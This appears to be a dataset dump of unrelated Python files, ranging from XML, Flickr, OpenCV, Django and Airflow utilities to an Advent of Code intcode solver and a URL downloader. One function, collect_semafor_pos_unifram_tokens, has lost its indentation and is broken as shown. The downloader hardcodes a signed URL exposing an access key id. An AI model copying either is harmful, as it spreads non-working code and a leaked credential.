        nothing.  An explicit ``is not None`` check is used instead.
        """
        element = self.CreateNode(tag, attrib, text)
        if Parent is not None:
            Parent.append(element)
            # Debug aid carried over from the original: show the <lizhi>
            # child of the root, guarding against it being absent
            # (find() returns None, which previously crashed on .tag).
            el = self.root.find("lizhi")
            if el is not None:
                print(el.tag, "----", el.attrib, "----", el.text)
        else:
            print("parent is none")

    def WriteXml(self, destfile):
        """Serialize the tree to *destfile* as UTF-8 with an XML declaration."""
        dest_xml_file = os.path.abspath(destfile)
        self.tree.write(dest_xml_file, encoding="utf-8", xml_declaration=True)
if __name__ == "__main__":
    # Demo: parse test.xml from the current directory, append a <Python>
    # node to its root, and write the result to testtest.xml.
    xml_file = os.path.abspath("test.xml")
    parse = XmlParse(xml_file)
    tree = parse.ReadXml()
    root = tree.getroot()
    print(root)
    parse.AddNode(root, "Python", {"age": "22", "hello": "world"}, "YES")
    parse.WriteXml("testtest.xml")
|
from optparse import OptionParser
from ..util import defines
from ..old_extractors import features
from ..util import file_handling as fh
def main():
    """Extract SEMAFOR frame tokens for one dataset (-d) or for every
    .json file in the raw-sentences directory, writing one token file per
    input and a default feature definition."""
    # Handle input options and arguments
    usage = "%prog"
    parser = OptionParser(usage=usage)
    parser.add_option('-d', dest='dataset', default='',
                      help='Dataset to process; (if not specified, all files in raw data directory will be used)')
    (options, args) = parser.parse_args()
    if options.dataset != '':
        # Single named dataset.
        input_dir = defines.data_raw_sents_dir
        filename = fh.make_filename(input_dir, options.dataset, 'json')
        files = [filename]
    else:
        # All raw sentence files.
        input_dir = defines.data_raw_sents_dir
        files = fh.ls(input_dir, '*.json')
    print "Extracting ngram tokens:"
    for f in files:
        print f
        output_dir = fh.makedirs(defines.data_token_dir, get_feature_name())
        basename = fh.get_basename(f)
        data = collect_semafor_pos_unifram_tokens(f)
        output_filename = fh.make_filename(output_dir, basename, 'json')
        fh.write_to_json(data, output_filename)
    # write default function definition
    features.make_feature_definition(get_feature_name(), filename=get_feature_name()+'_default',
                                     min_doc_threshold=2, binarize=True)
def get_feature_name():
    """Name of the feature family produced by this extractor."""
    return 'frames'
def get_prefix():
    """Token prefix that marks a frame feature."""
    return '_fr_'
def collect_semafor_pos_unifram_tokens(input_filename, prefix=''):
sent_index = fh.read_json(input_filename)
if prefix == '':
prefix = get_prefix()
basename = fh.get_basename(input_filename)
frames_filename = fh.make_filename(defines.data_semafor_dir, basename, 'fes')
frames = fh.read_text(frames_filename)
data = {}
values = set(sent_index.values())
for v in values:
data[v] = []
# read all sentences, except for the last (blank) line
for index, sent in enumerate(frames[:-1]):
print index, sent
parts = sent.split('\t')
frame = get_prefix() + parts[2]
sent = int(parts[6])
key = sent_index[sent]
data[key].append(frame)
return data
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# flickrbird.py
#
# Copyright 2010 Abhinay Omkar <abhiomkar AT gmail DOT com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; Version 3 of the License
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, the license can be downloaded here:
#
# http://www.gnu.org/licenses/gpl.html
# Meta
__version__ = '0.2'
__license__ = "GNU General Public License (GPL) Version 3"
__version_info__ = (0, 2)
__author__ = 'Abhinay Omkar <abhiomkar AT gmail DOT com>'
__maintainer__ = 'Tim Chan <tim AT timchan DOT com>'
#######################################################################################################################################################
# This script downloads Flickr User's public photos to current directory inside a folder denoted by the Flickr username you are trying to backup..
# Allows resuming download.
# Change the value of '_userFlickr' with the Flickr User's URL
# Change the value of '_photoSize' below
# Add your api_key and secret from your Flickr App Garden
#######################################################################################################################################################
import urllib, os, flickrapi
# Replace the below value with whatever URL of your Flickr photostream
_userFlickr = 'https://www.flickr.com/photos/photostreamhere'
# 's' small square 75x75
# 't' thumbnail, 100 on longest side
# 'm' small, 240 on longest side
# '' medium, 500 on longest side
# 'b' large, 1024 on longest side (only exists for very large original images)
# 'o' original image, either a jpg, gif or png, depending on source format (Pro Account Only)
_photoSize = 'o'
def main():
    """Download every public photo of the configured Flickr user.

    Downloaded ids are appended to a hidden ';'-separated log file in the
    target folder so an interrupted run can resume without re-downloading.
    """
    global _photoSize
    # NOTE(review): fill these in from your Flickr App Garden registration.
    api_key = ''
    secret = ''
    flickr = flickrapi.FlickrAPI(api_key, secret)
    # Convert Flickr URL to User NSID and get their username
    _userId = flickr.urls_lookupUser(url=_userFlickr).find('user').attrib['id']
    peopleUsername = flickr.people_getInfo(user_id=_userId).find('person/username').text
    print "--> Getting %s's photos" % peopleUsername
    # Get all user's public photos
    photos = []
    #Get number of pages
    numPages = flickr.people_getPublicPhotos(api_key=api_key, user_id = _userId, per_page = 500).find('photos').attrib['pages']
    #Where there is more than 1 page of photos, go through each page to get them all
    for i in range(1,int(numPages)+1):
        print "--> Getting page %s" % (str(i))
        publicPhotos = flickr.people_getPublicPhotos(api_key=api_key, user_id = _userId, per_page = 500, page = str(i))
        for photo in publicPhotos.getiterator('photo'):
            photos.append(photo.attrib['id'])
    totalPhotos=len(photos)
    #Create folder to house photos
    folder = os.path.join(os.getcwd(), peopleUsername)
    try:
        os.makedirs(folder)
        print "--> Created folder %s" % str(folder)
    except OSError:
        # Folder already exists; only re-raise if it is not a directory.
        print "--> Using folder %s" % str(folder)
        if not os.path.isdir(folder):
            raise
    # removing downloaded photos (log) from the download list (photos)
    print "--> Loading previously downloaded photos."
    # 'a+' creates the log when missing; seek(0) rewinds so it can be read.
    flog = open(os.path.join(os.getcwd(),peopleUsername,'.'+_userId+'-photos'),'a+'); flog.seek(0); log = flog.read().split(';')
    # Log entries are id+size, so suffix the fresh ids the same way before
    # set subtraction, then strip the suffix back off.
    photos = set([p+_photoSize for p in photos])-set(log)
    photos = [p.replace(_photoSize,'') for p in photos]
    if totalPhotos-len(photos):
        print "Skipping %s of %s photos. They are already downloaded." % (str(totalPhotos-len(photos)), str(totalPhotos))
    if len(photos)!=0:
        print "--> Started downloading %s photos" % str(len(photos))
        print '>> You can suspend the download with ^C.'
    # ok, start downloading photos one-by-one
    for photo in photos:
        photoTitle = flickr.photos_getInfo(photo_id=photo).find('photo/title').text or ''
        photoSizesTag = flickr.photos_getSizes(photo_id=photo).findall('sizes/size')
        photoSizes_list = [size.attrib['source'] for size in photoSizesTag]
        # Classify each size URL by its Flickr suffix (_s/_t/_m/_b/_o).
        photoSizes = {}
        for size in photoSizes_list:
            if size[-6:-4] == '_s':
                photoSizes['square'] = size
            elif size[-6:-4] == '_t':
                photoSizes['thumbnail'] = size
            elif size[-6:-4] == '_m':
                photoSizes['small'] = size
            elif size[-6:-4] == '_b':
                photoSizes['large'] = size
            elif size[-6:-4] == '_o':
                photoSizes['original'] = size
            else:
                photoSizes['medium'] = size
        # .jpg ?
        photoType = photoSizes['square'][-4:]
        _photoSize = _photoSize.strip()
        # Pick the URL for the requested size ('o' degrades gracefully).
        if _photoSize == 's':
            photoDownload = photoSizes['square']
        elif _photoSize == 't':
            photoDownload = photoSizes['thumbnail']
        elif _photoSize == 'm' and photoSizes.has_key('small'):
            photoDownload = photoSizes['small']
        elif _photoSize == '' and photoSizes.has_key('medium'):
            photoDownload = photoSizes['medium']
        elif _photoSize == 'b' and photoSizes.has_key('large'):
            photoDownload = photoSizes['large']
        elif _photoSize == 'o':
            if photoSizes.has_key('original'):
                photoDownload = photoSizes['original']
            elif photoSizes.has_key('large'):
                photoDownload = photoSizes['large']
            elif photoSizes.has_key('medium'):
                photoDownload = photoSizes['medium']
            elif photoSizes.has_key('small'):
                photoDownload = photoSizes['small']
        print "Downloading: %s" % photoTitle
        # unix doesn't accept '/' in a file name, try $ touch 'foo/bar'
        photoTitle = photoTitle.replace('/','_')
        if photoTitle.startswith('.'):
            # The filename which starts with '.' is a hidden file
            photoTitle = photoTitle.replace('.', '_', 1)
        # NOTE(review): this condition looks inverted -- a non-empty
        # _photoSize yields an empty suffix while '' yields '()'.  Confirm
        # the intended file-naming before changing it.
        if _photoSize:
            photoSuffix = ''
        else:
            photoSuffix = '('+_photoSize+')'
        # actually, downloading now...
        urllib.urlretrieve(photoDownload, os.path.join(os.getcwd(), peopleUsername ,photoTitle+' '+str(photo)+' '+photoSuffix+photoType))
        flog.write(photo+_photoSize+';')
    if not peopleUsername:
        # Some times the Flickr user doesn't have a real name, so...
        peopleUsername = _userId
    print "--> Downloaded %s photos of %s !" % (str(len(photos)), peopleUsername)
    flog.close()
    # You have some awesome photos
# You have some awesome photos
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # ^C suspends; the per-user log lets a later run resume downloads.
        print "\n <-- Run it again to resume download. Bye!"
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
from scipy.spatial import distance as dist
def show(imgs, h=8):
    """Display a list of BGR (OpenCV-order) images with matplotlib.

    A single image gets its own figure; multiple images are laid out in a
    row of subplots.  *h* is the figure width/height basis in inches.
    """
    n = len(imgs)
    if n == 1:
        plt.figure(figsize=(h, 6), dpi=80)
        plt.axis("off")
        # matplotlib expects RGB, so convert from OpenCV's BGR order.
        plt.imshow(cv2.cvtColor(imgs[0], cv2.COLOR_BGR2RGB))
        return
    f, axs = plt.subplots(1, n,figsize=(h,6*n))
    for i in range(n):
        axs[i].axis('off')
        axs[i].imshow(cv2.cvtColor(imgs[i], cv2.COLOR_BGR2RGB))
def annotate_points(img, points):
    """Draw a green circle at each of *points* on a copy of *img* and
    display the result; the input image is left untouched."""
    overlay = img.copy()
    for point in points:
        center = np.array(point).flatten().astype(int)
        overlay = cv2.circle(overlay, tuple(center), 8, (0, 255, 0), thickness=3)
    show([overlay])
def white_balance(img):
    """Gray-world style white balance performed in LAB space.

    Shifts the a/b chroma channels toward the neutral point (128) in
    proportion to each pixel's lightness, with a 1.1 over-correction
    factor.  Assumes *img* is an 8-bit BGR image -- TODO confirm (the 128
    neutral point and /255 scaling presume uint8 LAB values).
    """
    result = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    avg_a = np.average(result[:, :, 1])
    avg_b = np.average(result[:, :, 2])
    # Brighter pixels (higher L) receive a proportionally larger shift.
    result[:, :, 1] = result[:, :, 1] - ((avg_a - 128) * (result[:, :, 0] / 255.0) * 1.1)
    result[:, :, 2] = result[:, :, 2] - ((avg_b - 128) * (result[:, :, 0] / 255.0) * 1.1)
    result = cv2.cvtColor(result, cv2.COLOR_LAB2BGR)
    return result
def clockwise_corners(pts):
    """Order four corner points as [top-left, top-right, bottom-right,
    bottom-left].

    Splits the points into a left and a right pair by x-coordinate, orders
    the left pair by y, then tells bottom-right from top-right by distance
    from the top-left corner (the farther right-hand point is bottom-right).
    """
    corners = np.array(list(pts).copy() if isinstance(pts, list) else pts.copy())
    by_x = corners[np.argsort(corners[:, 0]), :]
    left_pair = by_x[:2, :]
    right_pair = by_x[2:, :]
    top_left, bottom_left = left_pair[np.argsort(left_pair[:, 1]), :]
    dists = dist.cdist(top_left[np.newaxis], right_pair, "euclidean")[0]
    bottom_right, top_right = right_pair[np.argsort(dists)[::-1], :]
    return np.array([top_left, top_right, bottom_right, bottom_left])
def warpBox(image,
            box,
            target_height=None,
            target_width=None,
            return_transform=False):
    """Warp a boxed region in an image given by a set of four points into
    a rectangle with a specified width and height. Useful for taking crops
    of distorted or rotated text.
    Args:
        image: The image from which to take the box
        box: A list of four points starting in the top left
            corner and moving clockwise.
        target_height: The height of the output rectangle
        target_width: The width of the output rectangle
        return_transform: Whether to return the transformation
            matrix with the image.
    """
    # Normalize corner order so the src->dst correspondence is stable
    # regardless of the order the caller supplied the points in.
    box = np.float32(clockwise_corners(box))
    w, h = image.shape[1], image.shape[0]
    assert (
        (target_width is None and target_height is None)
        or (target_width is not None and target_height is not None)), \
        'Either both or neither of target width and height must be provided.'
    if target_width is None and target_height is None:
        # Default: keep the source image's dimensions.
        target_width = w
        target_height = h
    # Destination corners listed in the same clockwise order as the source.
    M = cv2.getPerspectiveTransform(src=box, dst=np.array([[0, 0], [target_width, 0], [target_width, target_height], [0, target_height]]).astype('float32'))
    full = cv2.warpPerspective(image, M, dsize=(int(target_width), int(target_height)))
    if return_transform:
        return full, M
    return full
|
"""PDF Credentials API v2 views."""
import os
from django.utils.translation import gettext as _
from django.http import HttpResponse
from rest_framework import permissions
from rest_framework.views import APIView
from modoboa.admin.models import Domain
from modoboa.lib.throttle import UserLesserDdosUser
from .serializers import GetAccountCredentialsSerializer
from ...lib import rfc_6266_content_disposition
class PDFCredentialView(APIView):
    """Serve a generated PDF containing an account's credentials."""

    permission_classes = (
        permissions.IsAuthenticated, permissions.DjangoModelPermissions,
    )
    serializer_class = GetAccountCredentialsSerializer
    throttle_classes = [UserLesserDdosUser]

    def get_queryset(self):
        """Filter queryset based on current user."""
        return Domain.objects.get_for_admin(self.request.user)

    def get(self, request, *args, **kwargs):
        """View to download a document."""
        data = {"account_id": kwargs["account_id"]}
        # Consistency fix: honor the declared ``serializer_class`` instead
        # of referencing GetAccountCredentialsSerializer directly, so
        # subclasses overriding the attribute behave as expected.
        serializer = self.serializer_class(
            data=data, context={'request': request})
        serializer.is_valid(raise_exception=True)
        # save() generates the document; the serializer exposes the PDF
        # bytes and the suggested file name through its context.
        serializer.save()
        content = serializer.context["content"]
        fname = serializer.context["fname"]
        resp = HttpResponse(content)
        resp["Content-Type"] = "application/pdf"
        resp["Content-Length"] = len(content)
        # RFC 6266 encoding handles non-ASCII file names safely.
        resp["Content-Disposition"] = rfc_6266_content_disposition(fname)
        return resp
|
from airflow.contrib.hooks.aws_hook import AwsHook
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class StageToRedshiftOperator(BaseOperator):
    """Stage JSON or CSV files from S3 into a Redshift table via COPY.

    ``s3_src_pattern`` is a templated field, so it may embed Airflow
    context variables (e.g. the execution date) rendered per run.
    """

    ui_color = '#f8a5c2'
    ui_fgcolor = '#000000'
    template_fields = ("s3_src_pattern",)

    @apply_defaults
    def __init__(self,
                 # conexiones
                 redshift_conn='',
                 aws_credentials='',
                 table='',
                 s3_src_bucket='',
                 s3_src_pattern='',
                 data_format='json',
                 delimiter=',',
                 jsonpaths='auto',
                 ignore_header=0,
                 *args, **kwargs):
        """
        Args:
            redshift_conn: Airflow connection id for the Redshift cluster.
            aws_credentials: Airflow connection id holding the AWS keys.
            table: target staging table name.
            s3_src_bucket: source S3 bucket.
            s3_src_pattern: templated key pattern within the bucket.
            data_format: 'json' or 'csv'.
            delimiter: CSV field delimiter.
            jsonpaths: JSONPaths file location, or 'auto'.
            ignore_header: number of leading CSV rows to skip.
        """
        super(StageToRedshiftOperator, self).__init__(*args, **kwargs)
        self.redshift_conn = redshift_conn
        self.aws_credentials = aws_credentials
        self.table = table
        self.s3_src_bucket = s3_src_bucket
        self.s3_src_pattern = s3_src_pattern
        self.data_format = data_format
        self.delimiter = delimiter
        self.jsonpaths = jsonpaths
        self.ignore_header = ignore_header
        self.json_copy_sql = """
            COPY {}
            FROM '{}'
            ACCESS_KEY_ID '{}'
            SECRET_ACCESS_KEY '{}'
            JSON '{}'
            COMPUPDATE OFF
        """
        self.csv_copy_sql = """
            COPY {}
            FROM '{}'
            ACCESS_KEY_ID '{}'
            SECRET_ACCESS_KEY '{}'
            IGNOREHEADER {}
            DELIMITER '{}'
        """

    def execute(self, context):
        """Render the S3 path and run the COPY matching ``data_format``."""
        aws_hook = AwsHook(self.aws_credentials)
        credentials = aws_hook.get_credentials()
        redshift = PostgresHook(postgres_conn_id=self.redshift_conn)
        self.log.info("****************************************")
        self.log.info("Copying data from S3 to Redshift...")
        rendered_key = self.s3_src_pattern.format(**context)
        s3_path = "s3://{}/{}".format(self.s3_src_bucket, rendered_key)
        if self.data_format == "json":
            formatted_sql = self.json_copy_sql.format(
                self.table,              # COPY
                s3_path,                 # FROM
                credentials.access_key,  # ACCESS_KEY_ID
                credentials.secret_key,  # SECRET_ACCESS_KEY
                self.jsonpaths           # JSON
            )
            redshift.run(formatted_sql)
        if self.data_format == "csv":
            # Bug fix: the original referenced ``self.ignore_headers``,
            # which is never assigned (the attribute is ``ignore_header``),
            # so every CSV load raised AttributeError.
            formatted_sql = self.csv_copy_sql.format(
                self.table,              # COPY
                s3_path,                 # FROM
                credentials.access_key,  # ACCESS_KEY_ID
                credentials.secret_key,  # SECRET_ACCESS_KEY
                self.ignore_header,      # IGNOREHEADER
                self.delimiter           # DELIMITER
            )
            redshift.run(formatted_sql)
        self.log.info("Finished copying data from S3 to Redshift")
        self.log.info("****************************************")
|
from __future__ import division, print_function
import mock
import unittest
from smqtk.representation import DataSet
class DummyDataSet (DataSet):
    """Concrete no-op DataSet used purely as a test fixture.

    Every abstract method is stubbed; tests replace the methods they need
    (count, get_data, has_uuid) with mocks.
    """
    @classmethod
    def is_usable(cls):
        # Always report usable so the plugin machinery accepts this class.
        return True
    def __init__(self):
        super(DummyDataSet, self).__init__()
    def __iter__(self):
        pass
    def count(self):
        pass
    def uuids(self):
        pass
    def has_uuid(self, uuid):
        pass
    def add_data(self, *elems):
        pass
    def get_data(self, uuid):
        pass
    def get_config(self):
        # Empty config keeps the configurable-plugin contract satisfied.
        return {}
class TestDataSetAbstract (unittest.TestCase):
    """Exercise the dunder conveniences the abstract DataSet layers on top
    of its abstract API (__len__, __getitem__, __contains__)."""
    def test_len(self):
        # __len__ should delegate to count().
        expected_len = 134623456
        ds = DummyDataSet()
        ds.count = mock.MagicMock(return_value=expected_len)
        self.assertEqual(len(ds), expected_len)
    def test_getitem_mock(self):
        # __getitem__ should delegate to get_data() and propagate errors.
        expected_key = 'foo'
        expected_value = 'bar'
        def expected_effect(k):
            if k == expected_key:
                return expected_value
            raise RuntimeError("not expected key")
        ds = DummyDataSet()
        ds.get_data = mock.MagicMock(side_effect=expected_effect)
        self.assertRaisesRegexp(
            RuntimeError,
            "^not expected key$",
            ds.__getitem__, 'unexpectedKey'
        )
        self.assertEqual(ds[expected_key], expected_value)
    def test_contains(self):
        # Contains built-in hook expects data element and requests UUID from
        # that.
        expected_uuid = 'some uuid'
        mock_data_element = mock.MagicMock()
        mock_data_element.uuid = mock.MagicMock(return_value=expected_uuid)
        def expected_has_uuid_effect(k):
            if k == expected_uuid:
                return True
            return False
        ds = DummyDataSet()
        ds.has_uuid = mock.MagicMock(side_effect=expected_has_uuid_effect)
        self.assertTrue(mock_data_element in ds)
        # has_uuid must have been called exactly once, with the element's uuid.
        ds.has_uuid.assert_called_once_with(expected_uuid)
        mock_data_element.uuid.return_value = 'not expected uuid'
        self.assertFalse(mock_data_element in ds)
|
from django.contrib import admin
from .models import Profiles
# Expose the Profiles model in the Django admin with the default ModelAdmin.
admin.site.register(Profiles)
|
from collections import Counter
from argparse import ArgumentParser
from sys import argv
def read_text_from_file(filepath):
    """Return the entire contents of the text file at *filepath*."""
    with open(filepath) as handle:
        contents = handle.read()
    return contents
def remove_nonalpha_chars(text, ignore_list=None):
    """Strip every character that is neither alphabetic nor whitelisted.

    Args:
        text: input string.
        ignore_list: optional iterable of extra characters to keep
            (e.g. [' ', '\\n']).  Defaults to keeping none.

    Returns:
        The filtered string.
    """
    # Fix the mutable-default-argument pitfall of the original
    # (``ignore_list=[]``); a set also makes membership tests O(1).
    keep = set(ignore_list) if ignore_list else set()
    return ''.join(ch for ch in text if ch.isalpha() or ch in keep)
def get_most_frequent_words(text, top_counter):
    """Return the *top_counter* most common lowercase words in *text*.

    Non-alphabetic characters other than spaces and newlines are removed
    before the text is lowercased and split into words.
    """
    cleaned = remove_nonalpha_chars(text, [' ', '\n'])
    counts = Counter(cleaned.lower().split())
    return [word for word, _ in counts.most_common(top_counter)]
def parse_args(argv):
    """Parse CLI arguments: a required file path and an optional --top count."""
    parser = ArgumentParser()
    parser.add_argument('filepath', type=str, help='File containing the text')
    parser.add_argument(
        '--top',
        type=int,
        default=10,
        help='A number of most common words to display',
    )
    return parser.parse_args(argv)
if __name__ == '__main__':
    # CLI entry point: print the N most common words of the given file,
    # space-separated, most frequent first.
    args = parse_args(argv[1:])
    text = read_text_from_file(args.filepath)
    most_common_words = get_most_frequent_words(text, args.top)
    print(' '.join(most_common_words))
|
# Advent of Code 2019, day 7: load the comma-separated intcode program.
file = "Day7/inputnaomi.txt"
from itertools import permutations
with open(file,'r') as f:
    initial_intcode = list(map(int,f.read().split(',')))
    f.close()  # NOTE(review): redundant -- the with-block already closes f
def get_param(pos_mode, number, ic):
    """Resolve one intcode parameter.

    In position mode the value is read from memory at *number*; in
    immediate mode *number* itself is the value.
    """
    return ic[number] if pos_mode else number
def advance_intcode(inputs,ip,intcode,get_phase=True):
    """Run the intcode program until it produces an output or halts.

    Args:
        inputs: two-slot list [phase, signal].  When get_phase is True the
            first input instruction consumes the phase; every later input
            instruction reads the signal slot.
        ip: instruction pointer to resume from.
        intcode: program/memory, mutated in place.
        get_phase: whether the next input instruction takes the phase.

    Returns:
        (output, intcode, ip): output is the value produced by opcode 04,
        or None when the program halted on opcode 99 (or hit an unknown
        opcode).
    """
    in_index=0  # NOTE(review): unused leftover variable
    while intcode[ip]!=99:
        # Zero-pad to 5 digits: three parameter-mode digits + 2-digit opcode.
        instruction=("0000"+str(intcode[ip]))[-5:]
        # A "0" mode digit means position mode; p3 is computed but unused.
        p1, p2, p3 = [instruction[2-i]=="0" for i in range(3)]
        op=instruction[3:]
        # print(op)
        if op=="01":
            # add
            intcode[intcode[ip+3]]=get_param(p1,intcode[ip+1],intcode)+get_param(p2,intcode[ip+2],intcode)
            ip = ip+4
        elif op=="02":
            # multiply
            intcode[intcode[ip+3]]=get_param(p1,intcode[ip+1],intcode)*get_param(p2,intcode[ip+2],intcode)
            ip = ip+4
        elif op=="03":
            # input: the phase is consumed exactly once, then the signal slot
            if get_phase:
                intcode[intcode[ip+1]]=inputs[0]
                get_phase=False
            else:
                intcode[intcode[ip+1]]=inputs[1]
            ip = ip+2
        elif op=="04":
            # output: suspend and hand the value (plus state) to the caller
            return get_param(p1,intcode[ip+1],intcode), intcode, ip+2
        elif op=="05":
            # jump-if-true
            if get_param(p1,intcode[ip+1],intcode)!=0:
                ip=get_param(p2,intcode[ip+2],intcode)
            else:
                ip = ip+3
        elif op=="06":
            # jump-if-false
            if get_param(p1,intcode[ip+1],intcode)==0:
                ip=get_param(p2,intcode[ip+2],intcode)
            else:
                ip = ip+3
        elif op=="07":
            # less-than: store 1/0
            if get_param(p1,intcode[ip+1],intcode)<get_param(p2,intcode[ip+2],intcode):
                intcode[intcode[ip+3]]=1
                ip=ip+4
            else:
                intcode[intcode[ip+3]]=0
                ip=ip+4
        elif op=="08":
            # equals: store 1/0
            if get_param(p1,intcode[ip+1],intcode)==get_param(p2,intcode[ip+2],intcode):
                intcode[intcode[ip+3]]=1
                ip=ip+4
            else:
                intcode[intcode[ip+3]]=0
                ip=ip+4
        else:
            print('error: instruction reads '+instruction)
            break
    # Halted (opcode 99) or unknown instruction: no output value.
    return None, intcode, ip
def get_signal(config):
    """Run the five amplifiers once in series (part 1) and return the final
    output signal for the given phase-setting order."""
    signal = 0
    for amp_index in range(5):
        program = [val for val in initial_intcode]
        signal = advance_intcode([config[amp_index], signal], 0, program)[0]
    return signal
# Part 1: try every permutation of phase settings 0-4, keep the best signal.
orders = list(permutations(range(5)))
max_signal=0
for order in orders:
    signal=get_signal(order)
    if signal>max_signal:
        max_signal=signal
print("Part 1: "+str(max_signal))
# Part 2
class Amp:
    """One amplifier in the feedback loop: its own program copy, a saved
    instruction pointer, and a two-slot input [phase, latest signal]."""
    def __init__(self,phase):
        self.ic=[val for val in initial_intcode]  # private program copy
        self.ip=0                                 # resumable instruction pointer
        self.phase=phase
        self.input=[phase,0]                      # [phase setting, input signal]
        self.first_run=True                       # phase consumed on first input only
    def __str__(self):
        return "Amp "+str(self.phase)
    def advance(self):
        # Run until the next output (or halt), persisting state so the amp
        # can be resumed where it left off; sets self.output (None on halt).
        self.output, self.ic, self.ip = advance_intcode(self.input,self.ip,self.ic,self.first_run)
        self.first_run=False
def get_signal_2(config):
    """Feedback-loop mode (part 2): chain five amps in a ring and run until
    one halts; return the last signal produced.

    Cleanup: the original kept a dead ``loop`` counter and ended with a
    redundant ``del amps``; neither affected the result, so both are gone.
    """
    amps = [Amp(c) for c in config]
    signal = 0
    i = 0
    while True:
        amps[i % 5].advance()
        if amps[i % 5].output is None:
            # The amp halted on opcode 99 -- the feedback loop is done.
            break
        signal = amps[i % 5].output
        # Feed this output into the next amplifier in the ring.
        amps[(i + 1) % 5].input[1] = signal
        i += 1
    return signal
# Part 2: phase settings 5-9 with feedback; again keep the best signal.
orders = list(permutations(range(5,10)))
max_signal=0
for order in orders:
    signal=get_signal_2(order)
    if signal>max_signal:
        max_signal=signal
print("Part 2: "+str(max_signal))
|
import requests
# 读取的文件目录
reader_file = "/Users/yanmeng/Downloads/test.txt"
# 存放的文件夹路径
output_dictionary = "/Users/yanmeng/Downloads/chenzijuan/"
def download(url, index):
    """Fetch *url* and save it into output_dictionary.

    The saved file name is the 1-based *index* followed by the basename of
    the URL path (query string stripped).
    """
    r = requests.get(url)
    # Drop the query string, keep the last path component, prefix the index.
    filename = output_dictionary + str(index) + str(url.split('?')[0].split('/')[-1])
    with open(filename, "wb") as code:
        code.write(r.content)
    # Fix: the original called code.close() inside the with-block; the
    # context manager already closes the file, so the call was redundant.
# Batch mode (disabled): read one URL per line from reader_file and
# download each in turn, numbering files by line index.
# f = open(reader_file)
# lines = f.readlines()
# index = 0;
# for line in lines:
# index = index+1
# line = line.replace('\n','',1)
# print(line)
# download(line, index)
# f.close()
# Single-file mode: fetch one pre-signed OSS dataset URL as item 239.
download("http://101.201.177.119/dlcdc/space/gpfs01/sdb/sdb_files/datasets/SURF_CLI_CHN_MUL_DAY_V3.0/datasets/TEM/SURF_CLI_CHN_MUL_DAY-TEM-12001-200506.TXT?Expires=1517978555&OSSAccessKeyId=CcULE6lAfEbIFtKD&Signature=8OpHUv1labPEv5UN2j9i2rIT28A%3D",239)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.